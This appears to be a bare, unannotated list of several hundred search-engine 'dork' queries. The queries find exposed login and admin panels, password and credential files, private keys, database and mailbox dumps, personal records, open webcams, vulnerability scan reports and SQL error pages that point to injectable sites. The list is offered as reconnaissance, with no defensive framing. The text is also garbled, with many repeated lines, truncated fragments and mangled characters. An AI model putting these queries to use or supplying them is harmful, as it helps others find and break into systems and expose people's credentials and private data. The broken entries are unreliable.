intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Dell Remote Access Controller”
intitle:”Docutek ERes – Admin Login” -edu
intitle:”Employee Intranet Login”
intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”
intitle:”ePowerSwitch Login”
intitle:”eXist Database Administration” -demo
intitle:”EXTRANET * – Identification”
intitle:”EXTRANET login” -.edu -.mil -.gov
intitle:”EZPartner” -netpond
intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:”i-secure v1.1″ -edu
intitle:”Icecast Administration Admin Page”
intitle:”iDevAffiliate – admin” -demo
intitle:”ISPMan : Unauthorized Access prohibited”
intitle:”ITS System Information” “Please log on to the SAP System”
intitle:”Kurant Corporation StoreSense” filetype:bok
intitle:”ListMail Login” admin -demo
intitle:”Login -
Easy File Sharing Web Server”
intitle:”Login Forum
AnyBoard” intitle:”If you are a new user:” intext:”Forum
AnyBoard” inurl:gochat -edu
intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman
intitle:”Login to Cacti”
intitle:”Login to the forums – @www.aimoo.com” inurl:login.cfm?id=
intitle:”MailMan Login”
intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi
intitle:”Merak Mail Server Web Administration” -ihackstuff.com
intitle:”microsoft certificate services” inurl:certsrv
intitle:”MikroTik RouterOS Managing Webpage”
intitle:”MX Control Console” “If you can’t remember”
intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf
intitle:”Novell Web Services” intext:”Select a service and a language.”
intitle:”oMail-admin Administration – Login” -inurl:omnis.ch
intitle:”OnLine Recruitment Program – Login”
intitle:”Philex 0.2*” -script -site:freelists.org
intitle:”PHP Advanced Transfer” inurl:”login.php”
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”phpPgAdmin – Login” Language
intitle:”PHProjekt – login” login password
intitle:”please login” “your password is *”
intitle:”Remote Desktop Web Connection” inurl:tsweb
intitle:”SFXAdmin – sfx_global” | intitle:”SFXAdmin – sfx_local” | intitle:”SFXAdmin – sfx_test”
intitle:”SHOUTcast Administrator” inurl:admin.cgi
intitle:”site administration: please log in” “site designed by emarketsouth”
intitle:”Supero Doctor III” -inurl:supermicro
intitle:”SuSE Linux Openexchange Server” “Please activate JavaScript!”
intitle:”teamspeak server-administration
intitle:”Tomcat Server Administration”
intitle:”TOPdesk ApplicationServer”
intitle:”TUTOS Login”
intitle:”TWIG Login”
intitle:”vhost” intext:”vHost . 2000-2004″
intitle:”Virtual Server Administration System”
intitle:”VisNetic WebMail” inurl:”/mail/”
intitle:”VitalQIP IP Management System”
intitle:”VMware Management Interface:” inurl:”vmware/en/”
intitle:”VNC viewer for Java”
intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org
intitle:”WebLogic Server” intitle:”Console Login” inurl:console
intitle:”Welcome Site/User Administrator” “Please select the language” -demos
intitle:”Welcome to Mailtraq WebMail”
intitle:”welcome to netware *” -site:novell.com
intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”
intitle:”xams 0.0.0..15 – Login”
intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin
intitle:”XMail Web Administration Interface” intext:Login intext:password
intitle:”Zope Help System” inurl:HelpSys
intitle:”ZyXEL Prestige Router” “Enter password”
intitle:”inc. vpn 3000 concentrator”
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office “Enter your username and password to login”
intitle:ilohamail “
IlohaMail”
intitle:ilohamail intext:”Version 0.8.10″ “
IlohaMail”
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:”RT is ? Copyright”
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:”/admin/configuration. php?” Mystore
inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”
inurl:”1220/parse_xml.cgi?”
inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)
inurl:”:10000″ intext:webmin
inurl:”Activex/default.htm” “Demo”
inurl:”calendar.asp?action=login”
inurl:”default/login.php” intitle:”kerio”
inurl:”gs/adminlogin.aspx”
inurl:”php121login.php”
inurl:”suse/login.pl”
inurl:”typo3/index.php?u=” -demo
inurl:”usysinfo?login=true”
inurl:”utilities/TreeView.asp”
inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp
nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:”Microsoft Software Update Services”
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 “Oracle Enterprise Manager”
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator “welcome to mambo”
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:”WebCommander”
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php “SquirrelMail version”
inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:”postfix admin” ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl “Interface”
inurl:webvpn.html “login” “Please enter your”
Login (“
admin account info” filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
“# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd
“AutoCreate=TRUE password=*”
“http://*:*@www” domainname
“index of/” “ws_ftp.ini” “parent directory”
“liveice configuration file” ext:cfg -site:sourceforge.net
“parent directory” +proftpdpasswd
Duclassified” -site:duware.com “DUware All Rights reserved”
duclassmate” -site:duware.com
Dudirectory” -site:duware.com
dudownload” -site:duware.com
Elite Forum Version *.*”
Link Department”
“sets mode: +k”
“your password is” filetype:log
DUpaypal” -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret “current configuration” -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn
ext:inc “pwd=” “UID=”
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
LeapFTP intitle:”index.of./” sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs “intitle:index of”
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:”remote assessment” OpenAanval Console
intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”
“bp blog admin” intitle:login | intitle:admin -site:johnny.ihackstuff.com
“Emergisoft web applications are a part of our”
“Establishing a secure Integrated Lights Out session with” OR intitle:”Data Frame – Browser not HTTP 1.1 compatible” OR intitle:”HP Integrated Lights-
“HostingAccelerator” intitle:”login” +”Username” -”news” -demo
“iCONECT 4.1 :: Login”
“IMail Server Web Messaging” intitle:login
“inspanel” intitle:”login” -”cannot” “Login ID” -site:inspediumsoft.com
“intitle:3300 Integrated Communications Platform” inurl:main.htm
“Login – Sun Cobalt RaQ”
“login prompt” inurl:GM.cgi
“Login to Usermin” inurl:20000
“Microsoft CRM : Unsupported Browser Version”
“OPENSRS Domain Management” inurl:manage.cgi
“pcANYWHERE EXPRESS Java Client”
“Please authenticate yourself to get access to the management interface”
“please log in”
“Please login with admin pass” -”leak” -sourceforge
CuteNews” “2003..2005 CutePHP”
DWMail” password intitle:dwmail
Merak Mail Server Software” -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard” “Administrator Login”
Monster Top List” MTL numrange:200-
UebiMiau” -site:sourceforge.net
“site info for” “Enter Admin Password”
“SquirrelMail version” “By the SquirrelMail development Team”
“SysCP – login”
“This is a restricted Access Server” “Javas?ri?t Not Enabled!”|”Messenger Express” -edu -ac
“This section is for Administrators only. If you are an administrator then please”
“ttawlogin.cgi/?action=”
“VHCS Pro ver” -demo
“VNC Desktop” inurl:5800
“Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com
“WebExplorer Server – Login” “Welcome to WebExplorer Server”
“WebSTAR Mail – Please Log In”
“You have requested access to a restricted area of our website. Please authenticate yourself to continue.”
“You have requested to access the management functions” -.edu
(intitle:”Please login – Forums
UBB.threads”)|(inurl:login.php “ubb”)
(intitle:”Please login – Forums
WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)
(intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family
(intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)
(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:”Welcome to the Cyclades”
allinurl:”exchange/logon.asp”
allinurl:wps/portal/ login
ASP.login_aspx “ASP.NET_SessionId”
CGI:IRC Login
ext:cgi intitle:”control panel” “enter your owner password to continue!”
ez Publish administration
filetype:php inurl:”webeditor.php”
filetype:pl “Download: SuSE Linux Openexchange Server CA”
filetype:r2w r2w
Easy File Sharing Web Server”
intitle:”Login Forum
AnyBoard” intitle:”If you are a new user:” intext:”Forum
AnyBoard” inurl:gochat -edu
Login (“
Jetbox One CMS รข?¢” | “
Jetstream ? *”)
Novell NetWare intext:”netware management portal version”
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:”DocuShare” inurl:”docushare/dsweb/” -faq -gov -edu
“#mysql dump” filetype:sql
“#mysql dump” filetype:sql 21232f297a57a5a743894a0e4a801fc3
“allow_call_time_pass_reference” “PATH_INFO”
“Certificate Practice Statement” inurl:(PDF | DOC)
“Generated by phpSystem”
“generated by wwwstat”
“Host Vulnerability Summary Report”
“HTTP_FROM=googlebot” googlebot.com “Server_Software=”
“Index of” / “chat/logs”
“Installed Objects Scanner” inurl:default.asp
“MacHTTP” filetype:log inurl:machttp.log
“Mecury Version” “Infastructure Group”
“Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log
“Most Submitted Forms and s?ri?ts” “this section”
“Network Vulnerability Assessment Report”
“not for distribution” confidential
“not for public release” -.edu -.gov -.mil
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
“phpMyAdmin” “running on” inurl:”main.php”
“produced by getstats”
“Request Details” “Control Tree” “Server Variables”
“robots.txt” “Disallow:” filetype:txt
“Running in Child mode”
“sets mode: +p”
“sets mode: +s”
“Thank you for your order” +receipt
“This is a Shareaza Node”
“This report was generated by WebLog”
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher – Monitoring Results”)
(intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt
+”:8080″ +”:3128″ +”:80″ filetype:txt
-site:php.net -”The PHP Group” inurl:source inurl:url ext:pHp
94FBR “ADOBE PHOTOSHOP”
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log “Software: Microsoft Internet Information Services *.*”
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg “username=*” putty
ext:txt “Final encryption key”
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=” * Server.MapPath(“*.mdb”)
filetype:bkf bkf
filetype:blt “buddylist”
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -”cvs log”
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:”outlook.pst”
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg “Terminal Server Client”
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:”email.xls”
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please…
intext:”Session Start * * * *:*:* *” filetype:log
intext:”Tobias Oetiker” “traffic analysis”
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:”admin panel” +”
RedKernel”
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:”AppServ Open Project” -site:www.appservnetwork.com
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
intitle:”Big Sister” +”OK Attention Trouble”
intitle:”curriculum vitae” filetype:doc
intitle:”edna:streaming mp3 server” -forums
intitle:”FTP root at”
intitle:”index of” +myd size
intitle:”Index Of” -inurl:maillog maillog size
intitle:”Index Of” cookies.txt size
intitle:”index of” mysql.conf OR mysql_config
intitle:”Index of” upload size parent directory
intitle:”index.of *” admin news.asp configview.asp
intitle:”index.of” .diz .nfo last modified
intitle:”Joomla – Web Installer”
intitle:”LOGREP – Log file reporting system” -site:itefix.no
intitle:”Multimon UPS status page”
intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )
intitle:”PhpMyExplorer” inurl:”index.php” -cvs
intitle:”statistics of” “advanced web statistics”
intitle:”System Statistics” +”System and Network Information Center”
intitle:”urchin (5|3|admin)” ext:cgi
intitle:”Usage Statistics for” “Generated by Webalizer”
intitle:”wbem” compaq login “Compaq Information Technologies Group”
intitle:”Web Server Statistics for ****”
intitle:”web server status” SSH Telnet
intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”
intitle:”welcome.to.squeezebox”
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html “Bookmarks
intitle:index.of “Apache” “server at”
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:”phone”
inurl:”/axs/ax-admin.pl” -s?ri?t
inurl:”/cricket/grapher.cgi”
inurl:”bookmark.htm”
inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM
inurl:”newsletter/admin/”
inurl:”newsletter/admin/” intitle:”newsletter admin”
inurl:”putty.reg”
inurl:”smb.conf” intext:”workgroup” filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini “[emule]“
inurl:profiles filetype:mdb
inurl:report “EVEREST Home Edition “
inurl:server-info “Apache Server Information”
inurl:server-status “apache”
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php “page generated”
inurl:wp-mail.php + “There doesn’t seem to be any new mail.”
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
“detected an internal error [IBM][CLI Driver][DB2/6000]“
“error found handling the request” cocoon filetype:xml
“Fatal error: Call to undefined function” -reply -the -next
“Incorrect syntax near”
“Incorrect syntax near”
“Internal Server Error” “server at”
“Invision Power Board Database Error”
“ORA-00933: SQL command not properly ended”
“ORA-12541: TNS:no listener” intitle:”error occurred”
“Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php
“PostgreSQL query failed: ERROR: parser: parse error”
“Supplied argument is not a valid MySQL result resource”
“Syntax error in query expression ” -the
“The script whose uid is ” “is not allowed to access”
“There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”
“Unable to jump to row” “on MySQL result index” “on line”
“Unclosed quotation mark before the character string”
“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum
“Warning: Cannot modify header information – headers already sent”
“Warning: Division by zero in” “on line” -forum
“Warning: mysql_connect(): Access denied for user: ‘*@*” “on line” -help -forum
“Warning: mysql_query()” “invalid query”
“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”
“Warning: Supplied argument is not a valid File-Handle resource in”
“Warning:” “failed to open stream: HTTP request failed” “on line”
“Warning:” “SAFE MODE Restriction in effect.” “The script whose uid is” “is not allowed to access owned by uid 0 in” “on line”
“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”
An unexpected token “END-OF-STATEMENT” was found
Coldfusion Error Pages
filetype:asp + “[ODBC SQL"
filetype:asp "Custom Error Message" Category Source
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:php inurl:"logging.php" "Discuz" error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:"Error Message : Error loading required libraries."
intext:"Warning: Failed opening" "on line" "include_path"
intitle:"Apache Tomcat" "Error Report"
intitle:"Default PLESK Page"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"Execution of this script not permitted"
intitle:"Under construction" "does not currently have"
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument....
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing "include_path"
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning "error on line" php sablotron
Windows 2000 web server error messages
"ftp://" "www.eastgame.net"
"html allowed" guestbook
": vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp
+ View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Shadow Security Scanner performed a vulnerability assessment"
"SnortSnarf alert page"
"The following report contains confidential information" vulnerability -search
"The statistics were last upd?t?d" "Daily"-microsoft.com
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]” -filetype:htm
intitle:”ADSL Configuration page”
intitle:”Azureus : Java BitTorrent Client Tracker”
intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarc’s PC Management products, for large and small companies.”
intitle:”BNBT Tracker Info”
intitle:”Microsoft Site Server Analysis”
intitle:”Nessus Scan Report” “This file was generated by Nessus”
intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”
intitle:”Retina Report” “CONFIDENTIAL INFORMATION”
intitle:”start.managing.the.device” remote pbx acc
intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”
intitle:”twiki” inurl:”TWikiUsers”
inurl:”/catalog.nsf” intitle:catalog
inurl:”install/install.php”
inurl:”map.asp?” intitle:”WhatsUp Gold”
inurl:”NmConsole/Login.asp” | intitle:”Login – Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”
inurl:”sitescope.html” intitle:”sitescope” intext:”refresh” -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? “In real life”
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:”+PHPCounter 7.*”
inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ “created by phpsysinfo”
inurl:portscan.php “from Port”|”Port Range”
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
“A syntax error has occurred” filetype:ihtml
“access denied for user” “using password”
“An illegal character has been found in the statement” -”previous message”
“ASP.NET_SessionId” “data source=”
“Can’t connect to local” intitle:warning
“Chatologica MetaSearch” “stack tracking”
“detected an internal error [IBM][CLI Driver][DB2/6000]“
“error found handling the request” cocoon filetype:xml
“Fatal error: Call to undefined function” -reply -the -next
“Incorrect syntax near”
“Incorrect syntax near”
“Internal Server Error” “server at”
“Invision Power Board Database Error”
“ORA-00933: SQL command not properly ended”
“ORA-12541: TNS:no listener” intitle:”error occurred”
“Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php
“PostgreSQL query failed: ERROR: parser: parse error”
“Supplied argument is not a valid MySQL result resource”
“Syntax error in query expression ” -the
“The s?ri?t whose uid is ” “is not allowed to access”
“There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”
“Unable to jump to row” “on MySQL result index” “on line”
“Unclosed quotation mark before the character string”
“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum
“Warning: Cannot modify header information – headers already sent”
“Warning: Division by zero in” “on line” -forum
“Warning: mysql_connect(): Access denied for user: ‘*@*” “on line” -help -forum
“Warning: mysql_query()” “invalid query”
“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”
“Warning: Supplied argument is not a valid File-Handle resource in”
“Warning:” “failed to open stream: HTTP request failed” “on line”
“Warning:” “SAFE MODE Restriction in effect.” “The s?ri?t whose uid is” “is not allowed to access owned by uid 0 in” “on line”
“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”
An unexpected token “END-OF-STATEMENT” was found
Coldfusion Error Pages
filetype:asp + “[ODBC SQL”
filetype:asp “Custom Error Message” Category Source
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:php inurl:”logging.php” “Discuz” error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:”Error Message : Error loading required libraries.”
intext:”Warning: Failed opening” “on line” “include_path”
intitle:”Apache Tomcat” “Error Report”
intitle:”Default PLESK Page”
intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm
intitle:”Error Occurred” “The error occurred in” filetype:cfm
intitle:”Error using Hypernews” “Server Software”
intitle:”Execution of this s?ri?t not permitted”
intitle:”Under construction” “does not currently have”
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument….
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing “include_path”
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning “error on line” php sablotron
Windows 2000 web server error messages
“ftp://” “www.eastgame.net”
“html allowed” guestbook
: vBulletin Version 1.1.5″
“Select a database to view” intitle:”filemaker pro”
“set up the administrator user” inurl:pivot
“There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row
“Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin
